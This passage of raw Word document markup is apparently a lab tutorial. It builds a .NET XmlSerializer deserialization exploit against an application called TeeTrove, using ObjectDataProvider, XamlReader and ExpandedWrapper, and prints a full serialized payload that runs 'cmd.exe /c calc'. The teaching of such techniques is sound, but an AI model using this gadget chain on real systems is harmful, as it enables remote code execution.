          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;/sd:ProcessStartInfo.EnvironmentVariables&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/sd:ProcessStartInfo&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/sd:Process.StartInfo&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/sd:Process&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/ObjectDataProvider.ObjectInstance&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/ObjectDataProvider&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="649DBB4D" wp14:textId="5EF4DCB5">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Inside the XAML output, we can see a very long section listing all the environment variables. Since we don't need any specifically defined values, we can just remove this entire section (sd:ProcessStartInfo.EnvironmentVariables) to save space. Now before we do anything else, let's try deserializing the payload with XamlReader.Load just to make sure everything is working correctly so far. We can comment out the previous code and add the following lines to test:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="3FDF25D9" wp14:textId="32C9FE78">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="671AEF29" wp14:textId="7D8B04B2">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string payload = "&lt;ObjectDataProvider &lt;SNIP&gt;";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>XamlReader.Load(new MemoryStream(Encoding.ASCII.GetBytes(payload)));</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="5F15B301" wp14:textId="2204ADAD">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>As expected, when we run the program a calculator is spawned!</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="5669C9BF" wp14:textId="50C34D59">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="48D5C1CA" wp14:anchorId="7B902D28">
            <wp:extent cx="5724524" cy="4924424"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2122369812" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R2b70db5a23bb45a7">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="4924424"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="20D29C5C" wp14:textId="12851653">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ExpandedWrapper</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="7852FE9C" wp14:textId="14D377E8">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>At this point we have a payload for XamlReader, so we can get back to figuring out how we will pass this to XmlSerializer so that we can exploit TeeTrove. Going back to the slide from the BlackHat talk, we can see that it mentions a class called ExpandedWrapper that we need to use so that XmlSerializer understands runtime types.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="70C14D06" wp14:textId="02B9405A">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="405B809D" wp14:anchorId="6AC99B9B">
            <wp:extent cx="5724524" cy="1276350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1447988448" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Re2daab58fbfe4f65">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="1276350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="4E9BA262" wp14:textId="38E7FC45">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ExpandedWrapper is an internal .NET Framework class that we can use to wrap our XamlReader and ObjectDataProvider into an object which is serializable by XmlSerializer. We can comment everything else out and add the following lines to the end of our exploit program to set it up:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="7CAC4897" wp14:textId="480C62B7">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="43DB45D3" wp14:textId="639F5FC7">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string payload = "&lt;ObjectDataProvider &lt;SNIP&gt;"; // The payload for XamlReader</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ExpandedWrapper&lt;XamlReader, ObjectDataProvider&gt; expWrap = new ExpandedWrapper&lt;XamlReader, ObjectDataProvider&gt;();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>expWrap.ProjectedProperty0 = new ObjectDataProvider();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>expWrap.ProjectedProperty0.ObjectInstance = new XamlReader();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>expWrap.ProjectedProperty0.MethodName = "Parse";</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>expWrap.ProjectedProperty0.MethodParameters.Add(payload);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="767E7242" wp14:textId="46270D57">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>There will be an error regarding ExpandedWrapper because it is not referenced. Clear this up by hovering, selecting Show potential fixes and then selecting using System.Data.Services.Internal (from System.Data.Services).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="0D040F6E" wp14:textId="0D82A1DB">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="704B2031" wp14:anchorId="61874864">
            <wp:extent cx="5724524" cy="2400300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="902635007" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R25988755db134a6c">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="2400300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="5AB14428" wp14:textId="4411D35B">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Note that we used Parse instead of Load in the code above. Parse calls Load internally, and although Load resulted in the calculator spawning in our previous test, only Parse works for this next one. Running the program like this should once again result in a calculator spawning.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="0A5B1D45" wp14:textId="257973B7">
      <w:r>
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="00F79329" wp14:anchorId="3507F0D9">
            <wp:extent cx="5724524" cy="3324225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1578116117" name="" descr="image" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R1ec59fe07d3d4045">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="3324225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="437399BA" wp14:textId="7E1D87C0">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Now, we can add lines at the end of our program to serialize the ExpandedWrapper object with XmlSerializer:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="1E498097" wp14:textId="3F3B1949">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="5644064A" wp14:textId="27293B15">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MemoryStream ms = new MemoryStream();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>XmlSerializer xmlSerializer = new XmlSerializer(expWrap.GetType());</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>xmlSerializer.Serialize(ms, expWrap);</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Console.WriteLine(Encoding.ASCII.GetString(ms.ToArray()));</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="63F28C58" wp14:textId="37ADCFBB">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Run the program one more time, and we should get a serialized XML output in addition to a calculator popping up on our screens.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="16B6B9D3" wp14:textId="3283DEF7">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: xml</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="641EDD07" wp14:paraId="69F166A1" wp14:textId="3A2E955D">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&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;ExpandedWrapperOfXamlReaderObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;ProjectedProperty0&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;ObjectInstance xsi:type="XamlReader" /&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;MethodName&gt;Parse&lt;/MethodName&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;MethodParameters&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;anyType xsi:type="xsd:string"&gt;&amp;lt;ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"&amp;gt;&amp;lt;ObjectDataProvider.ObjectInstance&amp;gt;&amp;lt;sd:Process&amp;gt;&amp;lt;sd:Process.StartInfo&amp;gt;&amp;lt;sd:ProcessStartInfo Arguments="/c calc" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="C:\Windows\System32\cmd.exe"&amp;gt;&amp;lt;/sd:ProcessStartInfo&amp;gt;&amp;lt;/sd:Process.StartInfo&amp;gt;&amp;lt;/sd:Process&amp;gt;&amp;lt;/ObjectDataProvider.ObjectInstance&amp;gt;&amp;lt;/ObjectDataProvider&amp;gt;&lt;/anyType&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/MethodParameters&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/ProjectedProperty0&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>&lt;/ExpandedWrapperOfXamlReaderObjectDataProvider&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="318B0D22" wp14:textId="50A8D2BF">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Finally, we have a payload for XmlSerializer which should work. We can comment everything out once again and add the following lines to the end of the program to verify that it works:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="5A8E5285" wp14:textId="5EDCDB8E">
      <w:r w:rsidRPr="641EDD07" w:rsidR="641EDD07">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Code: csharp</w:t>
      </w:r>
    </w:p>
